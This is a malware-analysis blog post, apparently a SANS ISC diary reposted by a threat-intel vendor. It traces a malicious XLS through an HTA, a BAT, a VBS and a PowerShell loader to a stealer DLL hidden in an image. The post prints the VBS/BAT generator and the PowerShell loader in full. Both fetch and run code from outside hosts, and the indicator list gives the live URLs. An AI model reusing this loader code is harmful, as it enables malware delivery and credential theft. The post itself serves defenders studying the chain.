(520) 462-0516

info@threatintel-solutions.net

Threat Intel Solutions

Let’s Talk

More Steganography!, (Sat, Jun 14th)

[More Steganography!](/forums/diary/More+Steganography/32044/)==============================================================* * [](http://www.facebook.com/sharer.php?u=https%3A%2F%2Fisc.sans.edu%2Fforums%2Fdiary%2F32044 ‘Share on Facebook’)* [](http://twitter.com/share?text=More%20Steganography%21&url=https%3A%2F%2Fisc.sans.edu%2Fforums%2Fdiary%2F32044&via=SANS_ISC ‘Share on Twitter’) **Published** : 2025-06-14. **Last Updated** : 2025-06-14 07:19:40 UTC **by** [Xavier Mertens](/handler_list.html#xavier-mertens) (Version: 1) [0 comment(s)](/diary/More+Steganography/32044/#comments) I spotted another interesting file that uses, once again, steganography. It seems to be a trend (see one of my previous diaries-[[1](https://isc.sans.edu/diary/A+PNG+Image+With+an+Embedded+Gift/31998)-]). The file is an malicious Excel sheet called blcopy.xls. Office documents are rare these days because Microsoft improved the rules to allow automatic macro execution-[[2](https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked)-]. But it does not mean that Office documents can’t execute malicious code. In the sample I found (SHA256:c92c761a4c5c3f44e914d6654a678953d56d4d3a2329433afe1710b59c9acd3a), there are other embedded XLS sheets:“`remnux@remnux:~/malwarezoo/20250611$ oledump.py blcopy.xls 1: 114 ‘-x01CompObj’ 2: 244 ‘-x05DocumentSummaryInformation’ 3: 200 ‘-x05SummaryInformation’ 4: 114 ‘MBD012124E0/-x01CompObj’ 5: 448 ‘MBD012124E0/-x05DocumentSummaryInformation’ 6: 27016 ‘MBD012124E0/-x05SummaryInformation’ 7: 114 ‘MBD012124E0/MBD008FCB33/-x01CompObj’ 8: 68088 ‘MBD012124E0/MBD008FCB33/Package’ 9: 114 ‘MBD012124E0/MBD008FD33C/-x01CompObj’ 10: 652 ‘MBD012124E0/MBD008FD33C/-x05DocumentSummaryInformation’ 11: 30228 ‘MBD012124E0/MBD008FD33C/-x05SummaryInformation’ 12: 218567 ‘MBD012124E0/MBD008FD33C/Workbook’ 13: 114 ‘MBD012124E0/MBD008FDB50/-x01CompObj’ 14: 111781 ‘MBD012124E0/MBD008FDB50/Package’ 15: 114 ‘MBD012124E0/MBD008FED44/-x01CompObj’ 16: 408066 ‘MBD012124E0/MBD008FED44/Package’ 17: 373246 ‘MBD012124E0/Workbook’ 18: 716 ‘MBD012124E1/-x01Ole’ 19: 442912 ‘Workbook’ 20: 525 ‘_VBA_PROJECT_CUR/PROJECT’ 21: 104 ‘_VBA_PROJECT_CUR/PROJECTwm’ 22: m 977 ‘_VBA_PROJECT_CUR/VBA/Sheet1’ 23: m 977 ‘_VBA_PROJECT_CUR/VBA/Sheet2’ 24: m 977 ‘_VBA_PROJECT_CUR/VBA/Sheet3’ 25: m 985 ‘_VBA_PROJECT_CUR/VBA/ThisWorkbook’ 26: 2644 ‘_VBA_PROJECT_CUR/VBA/_VBA_PROJECT’ 27: 553 ‘_VBA_PROJECT_CUR/VBA/dir’remnux@remnux:~/malwarezoo/20250611$ oledump.py blcopy.xls -s 14 -d | zipdump.pyIndex Filename Encrypted Timestamp 1 [Content_Types].xml 0 1980-01-01 00:00:00 2 _rels/.rels 0 1980-01-01 00:00:00 3 xl/_rels/workbook.xml.rels 0 1980-01-01 00:00:00 4 xl/workbook.xml 0 1980-01-01 00:00:00 5 xl/worksheets/sheet4.xml 0 1980-01-01 00:00:00 6 xl/worksheets/_rels/sheet5.xml.rels 0 1980-01-01 00:00:00 7 xl/worksheets/_rels/sheet4.xml.rels 0 1980-01-01 00:00:00 8 xl/worksheets/_rels/sheet3.xml.rels 0 1980-01-01 00:00:00 9 xl/worksheets/_rels/sheet2.xml.rels 0 1980-01-01 00:00:00 10 xl/worksheets/_rels/sheet1.xml.rels 0 1980-01-01 00:00:00 11 xl/worksheets/sheet2.xml 0 1980-01-01 00:00:00 12 xl/worksheets/_rels/sheet6.xml.rels 0 1980-01-01 00:00:00 13 xl/worksheets/_rels/sheet7.xml.rels 0 1980-01-01 00:00:00 14 xl/worksheets/_rels/sheet8.xml.rels 0 1980-01-01 00:00:00 15 xl/worksheets/_rels/sheet13.xml.rels 0 1980-01-01 00:00:00 16 xl/worksheets/_rels/sheet12.xml.rels 0 1980-01-01 00:00:00 17 xl/worksheets/_rels/sheet11.xml.rels 0 1980-01-01 00:00:00 18 xl/worksheets/_rels/sheet10.xml.rels 0 1980-01-01 00:00:00 19 xl/worksheets/_rels/sheet9.xml.rels 0 1980-01-01 00:00:00 20 xl/worksheets/sheet3.xml 0 1980-01-01 00:00:00 21 xl/worksheets/sheet1.xml 0 1980-01-01 00:00:00 22 xl/styles.xml 0 1980-01-01 00:00:00 23 xl/worksheets/sheet11.xml 0 1980-01-01 00:00:00 24 xl/worksheets/sheet12.xml 0 1980-01-01 00:00:00 25 xl/worksheets/sheet13.xml 0 1980-01-01 00:00:00 26 xl/theme/theme1.xml 0 1980-01-01 00:00:00 27 xl/sharedStrings.xml 0 1980-01-01 00:00:00 28 xl/worksheets/sheet10.xml 0 1980-01-01 00:00:00 29 xl/worksheets/sheet8.xml 0 1980-01-01 00:00:00 30 xl/worksheets/sheet5.xml 0 1980-01-01 00:00:00 31 xl/worksheets/sheet6.xml 0 1980-01-01 00:00:00 32 xl/worksheets/sheet7.xml 0 1980-01-01 00:00:00 33 xl/worksheets/sheet9.xml 0 1980-01-01 00:00:00 34 xl/printerSettings/printerSettings5.bin 0 1980-01-01 00:00:00 35 xl/printerSettings/printerSettings4.bin 0 1980-01-01 00:00:00 36 xl/printerSettings/printerSettings2.bin 0 1980-01-01 00:00:00 37 xl/printerSettings/printerSettings6.bin 0 1980-01-01 00:00:00 38 xl/printerSettings/printerSettings7.bin 0 1980-01-01 00:00:00 39 xl/printerSettings/printerSettings8.bin 0 1980-01-01 00:00:00 40 xl/printerSettings/printerSettings9.bin 0 1980-01-01 00:00:00 41 xl/printerSettings/printerSettings10.bin 0 1980-01-01 00:00:00 42 xl/printerSettings/printerSettings11.bin 0 1980-01-01 00:00:00 43 xl/printerSettings/printerSettings12.bin 0 1980-01-01 00:00:00 44 xl/printerSettings/printerSettings13.bin 0 1980-01-01 00:00:00 45 xl/printerSettings/printerSettings3.bin 0 1980-01-01 00:00:00 46 xl/printerSettings/printerSettings1.bin 0 1980-01-01 00:00:00 47 docProps/thumbnail.wmf 0 1980-01-01 00:00:00 48 docProps/core.xml 0 1980-01-01 00:00:00 49 docProps/app.xml 0 1980-01-01 00:00:00 “`Let’s focus on the payload downloaded by this file:“`hxxp://107[.]172[.]235[.]203/245/wecreatedbestsolutionswithniceworkingskill.hta“`This HTA file will generate a BAT file (‘C:–Windows–Temp–invertase.bat’) that will generate and execute a VBS file (‘C:–Windows–Temp–poikilohydric.vbs’):“` Dim adarme Set adarme = CreateObject(‘WScript.Shell’) Dim bondwoman bondwoman = ‘C:-Windows-Temp-invertase.bat’ Dim leucanthemum, methylamines Set leucanthemum = CreateObject(‘Scripting.FileSystemObject’) Set methylamines = leucanthemum.CreateTextFile(bondwoman, True) methylamines.WriteLine ‘@echo off’ methylamines.WriteLine ‘setlocal’ methylamines.WriteLine ‘set ”fugues=C:-Windows-Temp-poikilohydric.vbs”’ methylamines.WriteLine ‘echo Dim morasses, raconteur > ”%fugues%”’ methylamines.WriteLine ‘echo morasses = Replace(StrReverse(”0@/@b@j@l@A@h@f@i@t@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@”), ”@”, ””) >> ”%fugues%”’ methylamines.WriteLine ‘echo Set raconteur = CreateObject(”MSXML2.ServerXMLHTTP”) >> ”%fugues%”’ methylamines.WriteLine ‘echo raconteur.open ”GET”, morasses, False >> ”%fugues%”’ methylamines.WriteLine ‘echo raconteur.send >> ”%fugues%”’ methylamines.WriteLine ‘echo If raconteur.Status = 200 Then >> ”%fugues%”’ methylamines.WriteLine ‘echo ExecuteGlobal raconteur.responseText >> ”%fugues%”’ methylamines.WriteLine ‘echo End If >> ”%fugues%”’ methylamines.WriteLine ‘start ”” /b wscript //nologo ”%fugues%”’ methylamines.WriteLine ‘timeout /t 1 /nobreak >nul’ methylamines.WriteLine ‘del ”%fugues%”’ methylamines.WriteLine ‘endlocal’ methylamines.Close adarme.Run ‘cmd.exe /c ”’ & bondwoman & ””, 0, False window.close“`The generated VBS file will fetch the next payload from the following URL:“`hxxp://paste[.]ee/d/tifhAljb/0“`This URL will fetch a long VBA script (SHA256:352ef6f5c4568d6ed6a018a5128cf538d33ea72bd040f0fd3b9bca6bd6a5dae9) that will generate a PowerShell script and execute it:“`$SuperSkills=’SilentlyContinue’;$preparsed=’hxxps://zynova[.]kesug[.]com/new_image.jpg’;$thysanurous=New-Object System.Net.WebClient;$thysanurous.Headers.Add(‘User-Agent’,’Mozilla/5.0′);[byte[]]$phytoestrogens=$thysanurous.DownloadData($preparsed);$septentrions=[System.Text.Encoding]::UTF8.GetString($phytoestrogens);$incunabula=’INICIO>>’;$prescience='<>’;$madrina=$newsbot;$nectaries=$septentrions.IndexOf($incunabula);$fiftysomethings=$septentrions.IndexOf($prescience);if($nectaries -ne -1 -and $fiftysomethings -ne -1 -and $fiftysomethings -gt $nectaries){ $nectaries+=$incunabula.Length; $madrina=$septentrions.Substring($nectaries,$fiftysomethings-$nectaries)};$dachshunds=’war/EP#7afLl/ppa.yfe#sap//:sp##h’;$dachshunds=$dachshunds.Replace(‘#’,’t’);$madrina=$madrina.Replace(‘@’,’A’);$nonassessable=[System.Convert]::FromBase64String($madrina);$narratology=[Reflection.Assembly]::Load($nonassessable);$toxodont=[dnlib.IO.Home].GetMethod(‘VAI’).Invoke($newsbot,[object[]]@($dachshunds,”,”,”,’aspnet_compiler’,”,”,”,”,’C:-Users-Public-Downloads’,’maungy’,’vbs’,”,”,’lygzeid’,’2′,”));“`That’s where the steganography stuff will happen!![](https://isc.sans.edu/diaryimages/images/isc-20250614-1.png)The technique used by the attacker is to add a malicious payload to the picture, delimited by the tags ‘INICIO->->’ and ‘-<–>’:“`remnux@remnux:~/malwarezoo/20250611$ grep -a -A 3 ‘INICIO’ new_image.jpg | moreN@?2?Sd?A??#*a?$?+!?w?$?2d8$? m??K>TVqQ@@M@@@@E@@@@//8@@Lg@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@4fug4@t@nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ@@@@@@@@@BQRQ@@T@ED@ExVKLM@@@@@@@@@@O@@DiEL@T@@@Fg1@@@I@@@@@@@@znY1@@@g@@@@gDU@@@B@@@@g@@@@@g@@B@@@@@@@@@@G@@@@@@@@@@D@NQ@@@g@@@@@@@@M@YIU@@B@@@B@@@@@@E@@@E@@@@@@@@@8@@@@@@@@@@@@@@IB2NQBL@@@@@I@1@P@F@@@@@@@@@@@@@@@@@@@@@@@@@K@1@@w@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@C@@@@@@@@@@@@@@@CC@@@Eg@@@@@@@@@@@@@@C50ZXh0@@@@1FY1@@@g@@@@WDU@@@I@@@@@@@@@@@@@@@@@@C@@@G@ucnNyYw@@@P@F@@@@gDU@@@Y@@@BaNQ@@@@@@@@@@@@@@@@B@@@B@LnJlbG9j@@@M@@@@@K@1@@@C@@@@YDU@@@@@@@@@@@@@@@@@Q@@@“`Can you spot the interesting magic bytes? (In red) They indicate the presence of a Base64-encode PE file!The decoded an deobfuscated payload is a DLL that is loaded and executed! (SHA256:5a73927d56c0fd4a805489d5817e1aa4fbd491e5a91ed36f4a2babef74158912). It seems to be a Katz stealer. Now you have more fresh meat to analyze!-[1-] -[2-] Xavier Mertens (@xme) Xameco Senior ISC Handler – Freelance Cyber Security Consultant [PGP Key](https://keybase.io/xme/key.asc) Keywords: [HTA](/tag.html?tag=HTA) [Katz](/tag.html?tag=Katz) [Malware](/tag.html?tag=Malware) [Payload](/tag.html?tag=Payload) [Steganography](/tag.html?tag=Steganography) [VBS](/tag.html?tag=VBS) [XLS](/tag.html?tag=XLS)[0 comment(s)](/diary/More+Steganography/32044/#comments)

Related Tags:
NAICS: 334 – Computer And Electronic Product Manufacturing

NAICS: 541 – Professional

Scientific

Technical Services

NAICS: 518 – Computing Infrastructure Providers

Data Processing

Web Hosting

Related Services

NAICS: 33 – Manufacturing – Metal

Electronics And Other

NAICS: 51 – Information

cmd.exe

cmd

Blog: SANS Internet Storm Center

Phishing: Spearphishing Attachment

Associated Indicators:
raconteur.open

http://paste.ee/d/tifhAljb/0

http://107.172.235.203/245/wecreatedbestsolutionswithniceworkingskill.hta

5A73927D56C0FD4A805489D5817E1AA4FBD491E5A91ED36F4A2BABEF74158912

C92C761A4C5C3F44E914D6654A678953D56D4D3A2329433AFE1710B59C9ACD3A

107.172.235.203

Search

Popular Posts

Categories

Pages

Archives

Tags

Follow Us